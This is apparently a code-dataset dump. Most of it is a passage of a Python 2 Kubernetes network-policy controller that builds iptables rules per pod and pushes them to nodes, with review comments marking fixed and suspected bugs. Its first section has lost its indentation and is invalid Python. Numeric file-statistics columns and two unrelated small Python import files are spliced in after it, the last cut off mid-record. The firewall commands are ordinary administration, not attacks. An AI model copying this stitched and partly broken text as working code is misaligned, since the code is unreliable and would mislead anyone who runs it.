if policy_info['policy_type'] == 'network_policy':
if 'pod_selector_labels' in policy_info:
if 'namespace' in policy_info:
if policy_info['namespace'] != ' ':
dest_pod_arr = get_ingress_nodes_of_pods_pod_selector(policy_info['namespace'], policy_info['pod_selector_labels'])
namespace_pod_arr = []
if 'namespace_labels' in ingress_info:
namespace_pod_arr = get_ingress_nodes_of_pods_namespace_selector(ingress_info['namespace_labels'])
print pod_arr, dest_pod_arr, namespace_pod_arr
if pod_arr != []:
if dest_pod_arr != []:
for policy_pod in xrange(len(dest_pod_arr)):
#Delete any existing rule
#iptables -A FORWARD -m comment --comment "network policy chain for POD podname " -d <podIP> -j KUBE-NWPLCY-podnamehash
policy_del = 'iptables -D FORWARD -d '+pod_arr[policy_pod]['pod_ip']+' -m comment --comment \" network policy chain for POD '+ dest_pod_arr[policy_pod]['pod_name'] + '\" -j KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:]
send_policy_to_node(dest_pod_arr[policy_pod]['node_name'], policy_del)
time.sleep(1)
print policy_del
#Optionally add a per policy forwarding chain as follows
#-A KUBE-NWPLCY-7UYHFX -m comment --comment "network policy rule for pod redis-slave-132015689-fksjt;policy: guestbook-network-policy" -j KUBE-NWPLCY-7UYHFX-SYJW74
#Add the new rule now
policy = 'iptables -N' + ' KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:]
send_policy_to_node(dest_pod_arr[policy_pod]['node_name'], policy)
time.sleep(1)
policy = 'iptables -A FORWARD -d '+pod_arr[policy_pod]['pod_ip']+' -m comment --comment \" network policy chain for POD '+ dest_pod_arr[policy_pod]['pod_name'] + '\" -j KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:]
send_policy_to_node(dest_pod_arr[policy_pod]['node_name'], policy)
time.sleep(1)
if dest_pod_arr[policy_pod]['node_name'] in policy_list:
policy_list[dest_pod_arr[policy_pod]['node_name']].append(policy_del)
else:
policy_list[dest_pod_arr[policy_pod]['node_name']] = []
policy_list[dest_pod_arr[policy_pod]['node_name']].append(policy_del)
for pod in xrange(len(pod_arr)):
#-A KUBE-NWPLCY-7UYHFX -s 10.244.3.4/32 -p tcp -m tcp --dport 6379 -m comment --comment "nw policy rule for peer POD frontend-88237173-zir4y" -j ACCEPT
#Delete any existing rule
#assuming only one pair of port and protocol for now
if 'ingress_ports' in ingress_info:
policy_del = 'iptables -D KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+pod_arr[pod]['pod_ip']+' -p ' +str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' -m '+str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' --dport ' + str(ingress_info['ingress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
else:
policy_del = 'iptables -D KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+pod_arr[pod]['pod_ip']+' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
send_policy_to_node(pod_arr[pod]['node_name'], policy_del)
time.sleep(1)
#Add the new rule now
if 'ingress_ports' in ingress_info:
policy = 'iptables -A KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+pod_arr[pod]['pod_ip']+' -p ' +str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' -m '+str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' --dport ' + str(ingress_info['ingress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
else:
policy = 'iptables -A KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+pod_arr[pod]['pod_ip']+' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
send_policy_to_node(dest_pod_arr[pod]['node_name'], policy)
time.sleep(1)
if dest_pod_arr[pod]['node_name'] in policy_list:
policy_list[dest_pod_arr[pod]['node_name']].append(policy_del)
else:
policy_list[dest_pod_arr[pod]['node_name']] = []
policy_list[dest_pod_arr[pod]['node_name']].append(policy_del)
if pod_arr != []:
if namespace_pod_arr != []:
for policy_pod in xrange(len(dest_pod_arr)):
#-A KUBE-NWPLCY-7UYHFX -s 10.244.3.4/32 -p tcp -m tcp --dport 6379 -m comment --comment "nw policy rule for peer POD frontend-88237173-zir4y" -j ACCEPT
#Delete any existing rule
#assuming only one pair of port and protocol for now
if 'ingress_ports' in ingress_info:
policy_del = 'iptables -D KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+namespace_pod_arr[pod]['pod_ip']+' -p ' +str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' -m '+str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' --dport ' + str(ingress_info['ingress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + namespace_pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
else:
policy_del = 'iptables -D KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+namespace_pod_arr[pod]['pod_ip']+' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + namespace_pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
send_policy_to_node(dest_pod_arr[pod]['node_name'], policy_del)
time.sleep(1)
#Add the new rule now
if 'ingress_ports' in ingress_info:
policy = 'iptables -A KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+namespace_pod_arr[pod]['pod_ip']+' -p ' +str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' -m '+str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' --dport ' + str(ingress_info['ingress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + namespace_pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
else:
policy = 'iptables -A KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+namespace_pod_arr[pod]['pod_ip']+' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod ' + namespace_pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
send_policy_to_node(dest_pod_arr[pod]['node_name'], policy)
time.sleep(1)
if dest_pod_arr[pod]['node_name'] in policy_list:
policy_list[dest_pod_arr[pod]['node_name']].append(policy_del)
else:
policy_list[dest_pod_arr[pod]['node_name']] = []
policy_list[dest_pod_arr[pod]['node_name']].append(policy_del)
if dest_pod_arr != []:
if 'from_ip_block_cidr' in ingress_info:
for pod in xrange(len(dest_pod_arr)):
#-A KUBE-NWPLCY-7UYHFX -s 10.244.3.4/32 -p tcp -m tcp --dport 6379 -m comment --comment "nw policy rule for peer POD frontend-88237173-zir4y" -j ACCEPT
#Delete any existing rule
#assuming only one pair of port and protocol for now
if 'ingress_ports' in ingress_info:
policy_del = 'iptables -D KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+ingress_info['from_ip_block_cidr']+' -p ' +str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' -m '+str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' --dport ' + str(ingress_info['ingress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from' + ingress_info['from_ip_block_cidr'] + '\" -j ACCEPT'
if 'except_ip_cidrs' in ingress_info:
policy_del_two = 'iptables -D KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+ingress_info['except_ip_cidrs'][0]+' -p ' +str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' -m '+str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' --dport ' + str(ingress_info['ingress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from' + ingress_info['except_ip_cidrs'][0] + '\" -j DROP'
else:
policy_del = 'iptables -D KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+namespace_pod_arr[pod]['pod_ip']+' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + namespace_pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
if 'except_ip_cidrs' in ingress_info:
policy_del_two = 'iptables -D KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+ingress_info['except_ip_cidrs'][0]+' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from' + ingress_info['except_ip_cidrs'][0] + '\" -j DROP'
send_policy_to_node(dest_pod_arr[pod]['node_name'], policy_del)
time.sleep(1)
send_policy_to_node(dest_pod_arr[pod]['node_name'], policy_del_two)
time.sleep(1)
if 'ingress_ports' in ingress_info:
policy = 'iptables -A KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+ingress_info['from_ip_block_cidr']+' -p ' +str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' -m '+str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' --dport ' + str(ingress_info['ingress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from' + ingress_info['from_ip_block_cidr'] + '\" -j ACCEPT'
if 'except_ip_cidrs' in ingress_info:
policy_two = 'iptables -A KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+ingress_info['except_ip_cidrs'][0]+' -p ' +str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' -m '+str(ingress_info['ingress_ports'][0]['protocol'].lower())+ ' --dport ' + str(ingress_info['ingress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from' + ingress_info['except_ip_cidrs'][0] + '\" -j DROP'
else:
policy = 'iptables -A KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+namespace_pod_arr[pod]['pod_ip']+' -m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from pod' + namespace_pod_arr[pod]['pod_name'] + '\" -j ACCEPT'
if 'except_ip_cidrs' in ingress_info:
policy_two = 'iptables -A KUBE-NWPLCY-'+ dest_pod_arr[policy_pod]['pod_name'][-5:] + ' -s '+ingress_info['except_ip_cidrs'][0]+ '-m comment --comment \"network policy for POD '+ dest_pod_arr[policy_pod]['pod_name'] + ' from' + ingress_info['except_ip_cidrs'][0] + '\" -j DROP'
print policy
send_policy_to_node(dest_pod_arr[pod]['node_name'], policy)
time.sleep(1)
print policy_two
send_policy_to_node(dest_pod_arr[pod]['node_name'], policy_two)
time.sleep(1)
if dest_pod_arr[pod]['node_name'] in policy_list:
policy_list[dest_pod_arr[pod]['node_name']].append(policy_del)
policy_list[dest_pod_arr[pod]['node_name']].append(policy_del_two)
else:
policy_list[dest_pod_arr[pod]['node_name']] = []
policy_list[dest_pod_arr[pod]['node_name']].append(policy_del)
policy_list[dest_pod_arr[pod]['node_name']].append(policy_del_two)
return policy_list
def create_egress_iptable_rules(egress_info, policy_info):
    """Build and push egress iptables rules for every pod the policy selects.

    For each selected pod this first deletes any stale copy of the rule
    (iptables -D), then adds the fresh rule (iptables -A) plus a trailing
    catch-all REJECT, and records the delete commands per node for later
    cleanup.

    egress_info -- dict, optionally containing 'to_ip_block_cidr' and
                   'egress_ports' (list of {'port', 'protocol'} dicts;
                   only the first pair is used for now)
    policy_info -- dict with 'policy_type', and optionally 'namespace' and
                   'pod_selector_labels'
    Returns a dict mapping node_name -> list of delete commands.
    """
    policy_list = {}
    # Implement for all possible scenarios like ingress - ipBlock,
    # pod_selector_labels, namespace_labels etc.
    # For now, just using ports and ipBlock
    src_pod_arr = []
    if policy_info['policy_type'] == 'network_policy':
        if 'pod_selector_labels' in policy_info:
            if 'namespace' in policy_info:
                if policy_info['namespace'] != ' ':
                    src_pod_arr = get_ingress_nodes_of_pods_pod_selector(policy_info['namespace'], policy_info['pod_selector_labels'])
    if 'to_ip_block_cidr' in egress_info:
        if 'egress_ports' in egress_info:
            for policy_pod in xrange(len(src_pod_arr)):
                # Delete any existing rule
                # assuming only one pair of port and protocol for now
                if 'egress_ports' in egress_info:
                    policy_del = 'iptables -D KUBE-NWPLCY-'+ src_pod_arr[policy_pod]['pod_name'][-5:] + ' -d '+egress_info['to_ip_block_cidr']+' -p ' +str(egress_info['egress_ports'][0]['protocol'].lower())+ ' -m '+str(egress_info['egress_ports'][0]['protocol'].lower())+ ' --sport ' + str(egress_info['egress_ports'][0]['port']) + ' -m comment --comment \"network policy for POD '+ src_pod_arr[policy_pod]['pod_name'] + ' from' + egress_info['to_ip_block_cidr'] + '\" -j ACCEPT'
                else:
                    # NOTE(review): unreachable while the loop itself is gated
                    # on 'egress_ports' above — kept for parity with the -A
                    # branch below; confirm whether the outer gate is intended.
                    policy_del = 'iptables -D KUBE-NWPLCY-'+ src_pod_arr[policy_pod]['pod_name'][-5:] + ' -d '+egress_info['to_ip_block_cidr']+' -m comment --comment \"network policy for POD '+ src_pod_arr[policy_pod]['pod_name'] + ' from ' + egress_info['to_ip_block_cidr'] + '\" -j ACCEPT'
                policy_two_del = 'iptables -D KUBE-NWPLCY-'+ src_pod_arr[policy_pod]['pod_name'][-5:] + ' -j REJECT'
                send_policy_to_node(src_pod_arr[policy_pod]['node_name'], policy_del)
                time.sleep(1)
                send_policy_to_node(src_pod_arr[policy_pod]['node_name'], policy_two_del)
                time.sleep(1)
                if 'egress_ports' in egress_info:
                    # BUG FIX: the original -A line mixed an undefined pod_arr
                    # reference with broken quoting
                    # ("... + '-d '+pod_arr[...]['pod_ip']+' ' -d '+ ..."),
                    # which was a SyntaxError; it now mirrors the -D rule above.
                    policy = 'iptables -A KUBE-NWPLCY-'+ src_pod_arr[policy_pod]['pod_name'][-5:] + ' -d '+egress_info['to_ip_block_cidr']+' -p ' + str(egress_info['egress_ports'][0]['protocol'].lower())+ ' -m '+str(egress_info['egress_ports'][0]['protocol'].lower())+ ' --sport ' + str(egress_info['egress_ports'][0]['port'])+ ' -m comment --comment \"network policy for POD '+ src_pod_arr[policy_pod]['pod_name'] + ' from' + egress_info['to_ip_block_cidr'] + '\" -j ACCEPT'
                else:
                    policy = 'iptables -A KUBE-NWPLCY-'+ src_pod_arr[policy_pod]['pod_name'][-5:] + ' -d '+egress_info['to_ip_block_cidr']+ ' -m comment --comment \"network policy for POD '+ src_pod_arr[policy_pod]['pod_name'] + ' from ' + egress_info['to_ip_block_cidr'] + '\" -j ACCEPT'
                policy_two = 'iptables -A KUBE-NWPLCY-'+ src_pod_arr[policy_pod]['pod_name'][-5:] + ' -j REJECT'
                send_policy_to_node(src_pod_arr[policy_pod]['node_name'], policy)
                time.sleep(1)
                send_policy_to_node(src_pod_arr[policy_pod]['node_name'], policy_two)
                time.sleep(1)
                # Remember the delete commands per node so the rules can be
                # removed when the policy is torn down.
                if src_pod_arr[policy_pod]['node_name'] in policy_list:
                    policy_list[src_pod_arr[policy_pod]['node_name']].append(policy_del)
                    policy_list[src_pod_arr[policy_pod]['node_name']].append(policy_two_del)
                else:
                    policy_list[src_pod_arr[policy_pod]['node_name']] = []
                    policy_list[src_pod_arr[policy_pod]['node_name']].append(policy_del)
                    policy_list[src_pod_arr[policy_pod]['node_name']].append(policy_two_del)
    return policy_list
def create_default_ingress_egress_deny_iptable_rules(policy_type, namespace):
    """Apply default-deny rules for both ingress and egress in *namespace*.

    Delegates to create_default_deny_iptable_rules once per direction and
    merges the two per-node delete-command dicts into one.

    policy_type -- must be 'default_deny_for_ingress_and_egress' for any work
                   to happen
    namespace   -- namespace whose pods get the deny rules
    Returns a dict mapping node_name -> list of delete commands (empty for an
    unrecognized policy_type).
    """
    policy_list_ingress = {}
    if policy_type == 'default_deny_for_ingress_and_egress':
        policy_list_ingress = create_default_deny_iptable_rules('default_deny_for_ingress', namespace)
        policy_list_egress = create_default_deny_iptable_rules('default_deny_for_egress', namespace)
        # BUG FIX: the original iterated the ingress keys and, for a key
        # missing from the egress dict, reset policy_list_ingress[key] to []
        # (dropping its ingress rules) and then read policy_list_egress[key],
        # which raised KeyError.  Merging from the egress side handles shared,
        # ingress-only and egress-only nodes correctly.
        for key in policy_list_egress:
            if key not in policy_list_ingress:
                policy_list_ingress[key] = []
            for rules in policy_list_egress[key]:
                policy_list_ingress[key].append(rules)
    return policy_list_ingress
def create_default_deny_iptable_rules(policy_type, namespace):
    """Install a default-deny (DROP) rule for every pod in *namespace*.

    'default_deny_for_ingress' drops traffic addressed to each pod
    (OUTPUT -d); 'default_deny_for_egress' drops traffic sourced from each pod
    (INPUT -s).  Each rule is first deleted (-D) to clear any stale copy, then
    re-inserted at the top of its chain (-I).
    Returns a dict mapping node_name -> list of delete commands.
    """
    policy_list = {}
    # (chain, address flag, comment word) per supported policy type.
    variants = {
        'default_deny_for_ingress': ('OUTPUT', '-d', 'ingress'),
        'default_deny_for_egress': ('INPUT', '-s', 'egress'),
    }
    if policy_type in variants and namespace != ' ':
        chain, flag, word = variants[policy_type]
        for entry in get_pods_of_namespace(namespace):
            rule_tail = flag + ' ' + entry['pod_ip'] + ' -m comment --comment "default ' + word + ' deny network policy for POD ' + entry['pod_name'] + '" -j DROP'
            # Remove any stale copy of the rule before inserting the new one.
            policy_del = 'iptables -D ' + chain + ' ' + rule_tail
            send_policy_to_node(entry['node_name'], policy_del)
            time.sleep(1)
            # Insert the fresh rule at the head of the chain.
            send_policy_to_node(entry['node_name'], 'iptables -I ' + chain + ' ' + rule_tail)
            time.sleep(1)
            policy_list.setdefault(entry['node_name'], []).append(policy_del)
    return policy_list
def create_default_allow_iptable_rules(policy_type, namespace):
    """Install a default-allow (ACCEPT) rule for every pod in *namespace*.

    'default_allow_for_ingress' accepts traffic addressed to each pod
    (OUTPUT -d); 'default_allow_for_egress' accepts traffic sourced from each
    pod (INPUT -s).  Each rule is first deleted (-D) to clear any stale copy,
    then re-inserted at the top of its chain (-I).
    Returns a dict mapping node_name -> list of delete commands.
    """
    policy_list = {}
    # (chain, address flag, comment word) per supported policy type.
    variants = {
        'default_allow_for_ingress': ('OUTPUT', '-d', 'ingress'),
        'default_allow_for_egress': ('INPUT', '-s', 'egress'),
    }
    if policy_type in variants and namespace != ' ':
        chain, flag, word = variants[policy_type]
        for entry in get_pods_of_namespace(namespace):
            rule_tail = flag + ' ' + entry['pod_ip'] + ' -m comment --comment "default ' + word + ' allow network policy for POD ' + entry['pod_name'] + '" -j ACCEPT'
            # Remove any stale copy of the rule before inserting the new one.
            policy_del = 'iptables -D ' + chain + ' ' + rule_tail
            send_policy_to_node(entry['node_name'], policy_del)
            time.sleep(1)
            # Insert the fresh rule at the head of the chain.
            send_policy_to_node(entry['node_name'], 'iptables -I ' + chain + ' ' + rule_tail)
            time.sleep(1)
            policy_list.setdefault(entry['node_name'], []).append(policy_del)
    return policy_list
def get_ingress_egress_policy_info(network_policy, uid):
    """Extract the ingress and egress selectors of one NetworkPolicy object.

    network_policy -- dict of raw NetworkPolicy objects keyed by metadata uid
    uid            -- key of the policy to inspect
    Returns {'ingress': {...}, 'egress': {...}} where each side may contain
    'ingress_ports'/'egress_ports', 'from_ip_block_cidr'/'to_ip_block_cidr',
    'except_ip_cidrs', 'namespace_labels' and 'pod_labels', depending on what
    the policy spec declares.  Later rules in the spec overwrite earlier ones
    (only one value is kept per key, matching the original behavior).
    """
    ingress_info = {}
    egress_info = {}
    ingress_egress_info = {}
    for policyTypes in network_policy[uid]['spec']['policyTypes']:
        if policyTypes == 'Ingress':
            for items in network_policy[uid]['spec']['ingress']:
                if 'ports' in items:
                    ingress_info['ingress_ports'] = items['ports']
                for filters in items['from']:
                    if 'ipBlock' in filters:
                        ingress_info['from_ip_block_cidr'] = filters['ipBlock']['cidr']
                        if 'except' in filters['ipBlock']:
                            ingress_info['except_ip_cidrs'] = filters['ipBlock']['except']
                    elif 'namespaceSelector' in filters:
                        if 'matchLabels' in filters['namespaceSelector']:
                            ingress_info['namespace_labels'] = filters['namespaceSelector']['matchLabels']
                    elif 'podSelector' in filters:
                        if 'matchLabels' in filters['podSelector']:
                            ingress_info['pod_labels'] = filters['podSelector']['matchLabels']
        elif policyTypes == 'Egress':
            for items in network_policy[uid]['spec']['egress']:
                if 'ports' in items:
                    egress_info['egress_ports'] = items['ports']
                for filters in items['to']:
                    if 'ipBlock' in filters:
                        egress_info['to_ip_block_cidr'] = filters['ipBlock']['cidr']
                        if 'except' in filters['ipBlock']:
                            egress_info['except_ip_cidrs'] = filters['ipBlock']['except']
                    elif 'namespaceSelector' in filters:
                        if 'matchLabels' in filters['namespaceSelector']:
                            egress_info['namespace_labels'] = filters['namespaceSelector']['matchLabels']
                    elif 'podSelector' in filters:
                        # BUG FIX: guard 'matchLabels' like every other branch;
                        # an empty podSelector ({}) previously raised KeyError.
                        if 'matchLabels' in filters['podSelector']:
                            egress_info['pod_labels'] = filters['podSelector']['matchLabels']
    ingress_egress_info['ingress'] = ingress_info
    ingress_egress_info['egress'] = egress_info
    return ingress_egress_info
def get_pods_of_namespace(namespace):
    """Return [{'pod_name', 'node_name', 'pod_ip'}] for every pod in *namespace*.

    Queries the Kubernetes CoreV1 API with the same fixed options the rest of
    the file uses (limit 56, 30 s timeout, uninitialized pods included).
    """
    configuration = config.load_kube_config()
    api_instance_pod = kubernetes.client.CoreV1Api(kubernetes.client.ApiClient(configuration))
    api_response = api_instance_pod.list_namespaced_pod(
        namespace,
        pretty='true',
        include_uninitialized=True,
        limit=56,
        timeout_seconds=30)
    # One summary dict per pod; only the fields the rule builders need.
    return [{'pod_name': item.metadata.name,
             'node_name': item.spec.node_name,
             'pod_ip': item.status.pod_ip}
            for item in api_response.items]
def get_ingress_nodes_of_pods_pod_selector(namespace, pod_labels):
    """List pods in *namespace* matching all of *pod_labels*.

    namespace  -- namespace to query
    pod_labels -- dict of label key -> value; combined into a single
                  comma-separated Kubernetes label selector (logical AND)
    Returns [{'pod_name', 'node_name', 'pod_ip'}] for each matching pod.
    """
    pod_dict = {}
    pod_arr = []
    configuration = config.load_kube_config()
    api_instance_pod = kubernetes.client.CoreV1Api(kubernetes.client.ApiClient(configuration))
    include_uninitialized = True
    # BUG FIX: the original overwrote the selector string on every loop pass,
    # so only one (arbitrary) label survived when several were given; join all
    # pairs with ',' which the Kubernetes API treats as AND.
    label_selector = ','.join(key + '=' + pod_labels[key] for key in pod_labels)
    limit = 56
    pretty = 'true'
    timeout_seconds = 30
    api_response = api_instance_pod.list_namespaced_pod(namespace, pretty=pretty, include_uninitialized=include_uninitialized, label_selector=label_selector, limit=limit, timeout_seconds=timeout_seconds)
    for pod in xrange(len(api_response.items)):
        pod_dict['pod_name'] = api_response.items[pod].metadata.name
        pod_dict['node_name'] = api_response.items[pod].spec.node_name
        pod_dict['pod_ip'] = api_response.items[pod].status.pod_ip
        pod_arr.append(pod_dict)
        pod_dict = {}
    return pod_arr
def get_ingress_nodes_of_pods_namespace_selector(namespace_selector_labels):
    """List pods across all namespaces that match the given labels.

    namespace_selector_labels -- dict of label key -> value; combined into a
    single comma-separated Kubernetes label selector (logical AND).
    Returns [{'pod_name', 'node_name', 'pod_ip'}] for each matching pod.

    NOTE(review): list_pod_for_all_namespaces filters on POD labels here;
    selecting by NAMESPACE labels would require listing namespaces first and
    then their pods — confirm the intended semantics.
    """
    pod_arr = []
    pod_dict = {}
    configuration = config.load_kube_config()
    api_instance_pod = kubernetes.client.CoreV1Api(kubernetes.client.ApiClient(configuration))
    include_uninitialized = True
    # BUG FIX: the original rebuilt the selector string on each pass of the
    # loop, keeping only the last label; join all pairs with ',' (AND).
    label_selector = ','.join(key + '=' + namespace_selector_labels[key] for key in namespace_selector_labels)
    limit = 56
    pretty = 'true'
    timeout_seconds = 30
    api_response = api_instance_pod.list_pod_for_all_namespaces(pretty=pretty, include_uninitialized=include_uninitialized, label_selector=label_selector, limit=limit, timeout_seconds=timeout_seconds)
    for pod in xrange(len(api_response.items)):
        pod_dict['pod_name'] = api_response.items[pod].metadata.name
        pod_dict['node_name'] = api_response.items[pod].spec.node_name
        pod_dict['pod_ip'] = api_response.items[pod].status.pod_ip
        pod_arr.append(pod_dict)
        pod_dict = {}
    return pod_arr
def create_updated_policy_rules(network_policy_updated, callback):
    """Log the update notice, pause briefly, then hand the updated policy dict
    to *callback* (the tornado gen.Task completion callback)."""
    notice = 'Checking updated policy contents to add iptables based rules'
    print(notice)
    time.sleep(1)
    callback(network_policy_updated)
@gen.engine
def watch_for_policies():
    """Watch NetworkPolicy objects cluster-wide and build rules for each event.

    Runs under tornado's gen.engine: each policy is handed to the rule
    builders via gen.Task so the watch loop keeps servicing events.  Stops the
    IOLoop when the watch stream ends.
    """
    config.load_kube_config()
    v1 = client.ExtensionsV1beta1Api()
    network_policy = {}
    # BUG FIX: this dict was declared as 'network_policy_update' while the
    # handler below used 'network_policy_updated', so the first update event
    # raised NameError.
    network_policy_updated = {}
    w = watch.Watch()
    for event in w.stream(v1.list_network_policy_for_all_namespaces):
        print(event)
        print("Event: %s %s %s" % (event['type'], event['object'].kind, event['object'].metadata.name))
        if event['type'] == 'ADDED':
            # Only process each policy uid once.
            if event['object'].metadata.uid not in network_policy:
                network_policy[event['object'].metadata.uid] = event['raw_object']
                result = yield gen.Task(create_new_policy_rules, network_policy, event['object'].metadata.uid)
        elif event['type'] == 'UPDATED':
            # NOTE(review): the Kubernetes watch API reports modifications as
            # 'MODIFIED'; confirm whether 'UPDATED' ever fires here.
            network_policy_updated[event['object'].metadata.uid] = event['raw_object']
            result = yield gen.Task(create_updated_policy_rules, network_policy_updated)
    IOLoop.instance().stop()
# Entry point: kick off the NetworkPolicy watcher, then run the tornado
# IOLoop so the gen.engine coroutine can make progress.
if __name__ == "__main__":
    watch_for_policies()
    IOLoop.instance().start()
| 62.346021
| 513
| 0.612304
| 4,558
| 36,036
| 4.513383
| 0.050241
| 0.055123
| 0.036749
| 0.048853
| 0.863309
| 0.842553
| 0.816741
| 0.782374
| 0.762979
| 0.757729
| 0
| 0.007118
| 0.251526
| 36,036
| 577
| 514
| 62.454073
| 0.755598
| 0.046398
| 0
| 0.588621
| 0
| 0.010941
| 0.245835
| 0.017127
| 0.002188
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.015317
| null | null | 0.028446
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
393600f3c62483f796d71908699572205e88a00a
| 117
|
py
|
Python
|
QAStrategyCenter/Loader/__init__.py
|
yutiansut/QAStrategyTemplate
|
d5e8a8c55e815246f5131591481e1ff05ae21dea
|
[
"MIT"
] | null | null | null |
QAStrategyCenter/Loader/__init__.py
|
yutiansut/QAStrategyTemplate
|
d5e8a8c55e815246f5131591481e1ff05ae21dea
|
[
"MIT"
] | null | null | null |
QAStrategyCenter/Loader/__init__.py
|
yutiansut/QAStrategyTemplate
|
d5e8a8c55e815246f5131591481e1ff05ae21dea
|
[
"MIT"
] | null | null | null |
from QAStrategyCenter.Loader.render import QASPMSRender
from QAStrategyCenter.Loader.fileloader import load_from_file
| 58.5
| 61
| 0.905983
| 14
| 117
| 7.428571
| 0.642857
| 0.384615
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.059829
| 117
| 2
| 61
| 58.5
| 0.945455
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
1a445ca6f37cd4d17a568d56c7337c882a76710d
| 237
|
py
|
Python
|
deepdanbooru/model/__init__.py
|
fredgido/DeepDanbooru
|
044a92472bd153e227287be29c6f32ce7feb28a6
|
[
"MIT"
] | 4
|
2020-04-01T09:55:31.000Z
|
2022-01-07T08:40:52.000Z
|
deepdanbooru/model/__init__.py
|
Amaotomiyabi/DeepDanbooru
|
bf98806390ced6e78e8d4a05e006c1216bf48508
|
[
"MIT"
] | null | null | null |
deepdanbooru/model/__init__.py
|
Amaotomiyabi/DeepDanbooru
|
bf98806390ced6e78e8d4a05e006c1216bf48508
|
[
"MIT"
] | 1
|
2020-11-25T06:54:52.000Z
|
2020-11-25T06:54:52.000Z
|
import deepdanbooru.model.layers
import deepdanbooru.model.losses
from .resnet import create_resnet_152
from .resnet import create_resnet_custom_v1
from .resnet import create_resnet_custom_v2
from .resnet import create_resnet_custom_v3
| 29.625
| 43
| 0.877637
| 35
| 237
| 5.628571
| 0.371429
| 0.203046
| 0.324873
| 0.446701
